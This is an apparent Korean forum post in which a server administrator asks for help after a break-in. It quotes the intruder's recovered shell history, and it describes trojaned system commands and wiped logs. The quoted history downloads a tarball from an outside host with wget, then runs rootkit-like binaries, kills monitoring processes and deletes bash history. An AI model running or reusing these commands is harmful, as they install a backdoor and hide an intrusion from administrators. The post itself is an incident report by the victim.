해킹당한거 같아요 어떻게 해야할지... ㅠㅠ

네~ 안녕하세요

어제 책을 다 받았습니다.

그런데 뭐하나 물어볼게요  . 책의 내용과는 별 상관이 없는데

물어볼사람이 없어서

어제 제가 관리하는 서버가 해킹을 당한것 같은데요. 어떻게 해야할지.

해킹한사람이 했던 작업을 분석해봤습니다.

socklist
./socklist
killall -9 zbind
cd /tmp
rm -rf j za
cd /dev
mkdir da
cd da
wget www.versace.as.ro/bune.tar.gz
tar xzvf bune.tar.gz
rm -rf bune.tar.gz
cd nou
./sslsecure
./sk
./sk i 3128
./socklist
./sk i 3000
./sk i 3049
./socklist
./sk i 2998
./socklist
killall -9 nessusd
killall -9 python
cd
cd ..
ls -a
rm -rf .bash_history

이런작업을 했더군요.

도대체 뭘해놓고같는지 그리고 이로인해서 netstat 명령이 먹지 않고 텔넷 포트가 열려서 죽지않습니다.

그래서 임시로 netstat 파일 백업본을 복사해서 하니까 포트가 검색 되더군요.

그래서 포트를 우선 필요없는 포트를 모조리 제거하고  이놈의 해커가 깔아놓은 프로그램의 퍼미션을 0000 으로 바꿔 버렸습니다. 지우면 증거가 없어질것 같아서 남겨만 놨습니다.

보니까 이놈이

[1] w
[2] who
[3] ps
[4] ls
[5] netstat

이와같은 명령어를  수정한거 같습니다.

그리고 파일수정날자랑 로그도 지운거 같던데...

이럴경우 해킹한사람을 잡으면 어떻게 처리해야하죠?

잡히면 ....그냥...~ 지금 잠도 못자고 밤샜습니다.

좀 분석 부탁할게요.

저의 메일은 ncyber78@hotmail.com 입니다.

그럼 수고하세요 바쁘신데... ^ ^